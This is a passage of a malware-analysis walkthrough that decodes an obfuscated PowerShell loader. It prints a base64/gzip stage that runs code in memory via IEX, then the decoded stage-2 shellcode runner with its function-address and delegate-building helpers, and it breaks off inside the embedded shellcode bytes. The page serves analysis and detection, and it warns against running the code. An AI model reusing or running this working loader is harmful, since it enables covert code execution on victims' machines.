将 PowerShell 载荷中的 base64 解码并经 gzip 解压,即可获得真实代码(注意:base64 只是编码而非加密,因此这一步不需要任何密钥)。
PowerShell
# Stage-1 loader: base64-decode the blob -> gzip-decompress it -> hand the resulting
# text to IEX (Invoke-Expression), i.e. the stage-2 script is executed purely in memory.
# For analysis, replace the trailing IEX with Write-Output so the decoded script is
# printed instead of run. The base64 payload itself is elided from this page.
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
得到的是经过混淆的代码;将末尾的 IEX 替换为 Write-Output(只打印、不执行),即可得到解码后的代码。请务必在隔离的分析环境中操作,切勿原样执行带有 IEX 的语句。
PowerShell
# Start of the decoded stage-2 script. Strict mode 2 turns references to unset
# variables and to non-existent properties into terminating errors inside the loader.
Set-StrictMode -Version 2
$DoIt = @'
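# Resolves the address of an exported native function without Add-Type / P/Invoke,
# by reflecting into the CLR's own internal native-method wrappers.
#   $var_module    - module name handed to GetModuleHandle (e.g. a DLL name)
#   $var_procedure - exported function name handed to GetProcAddress
# Returns whatever UnsafeNativeMethods.GetProcAddress returns for that pair (the
# export's address). Its consumer lies past the end of this listing; presumably the
# address is wrapped in a delegate built by func_get_delegate_type.
# NOTE(review): this is the widely copied Get-ProcAddress helper pattern; the literals
# 'System.dll' and 'Microsoft.Win32.UnsafeNativeMethods' are common static-detection
# indicators. The only change from the page's listing is that lines hard-wrapped in
# the middle of identifiers have been rejoined so the code parses.
function func_get_proc_address {
    Param ($var_module, $var_procedure)
    # Find the GAC-loaded System.dll and pull its non-public
    # Microsoft.Win32.UnsafeNativeMethods type (internal P/Invoke declarations).
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    # Select the GetProcAddress(HandleRef, string) overload.
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    # GetModuleHandle($var_module) -> wrap in HandleRef -> GetProcAddress(handle, $var_procedure).
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}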
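# Builds a delegate type with the given parameter list and return type at runtime
# via Reflection.Emit (AssemblyBuilderAccess::Run: in-memory only, nothing is saved).
#   $var_parameters  - [Type[]] parameter types of the delegate's Invoke method
#   $var_return_type - return type of Invoke, defaults to [Void]
# Returns the created [Type]. Its consumer lies past the end of this listing;
# presumably it is paired with the address from func_get_proc_address through
# Marshal.GetDelegateForFunctionPointer to call native code.
# NOTE(review): the literal names 'ReflectedDelegate', 'InMemoryModule' and
# 'MyDelegateType' are reused verbatim across many loaders and serve as detection
# indicators. The only change from the page's listing is that a line hard-wrapped in
# the middle of DefineDynamicModule has been rejoined so the code parses.
function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )
    # Dynamic assembly -> dynamic module -> public sealed class deriving from MulticastDelegate.
    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    # Delegate ctor and Invoke bodies are supplied by the runtime, hence 'Runtime, Managed'.
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
    return $var_type_builder.CreateType()
}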
[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFq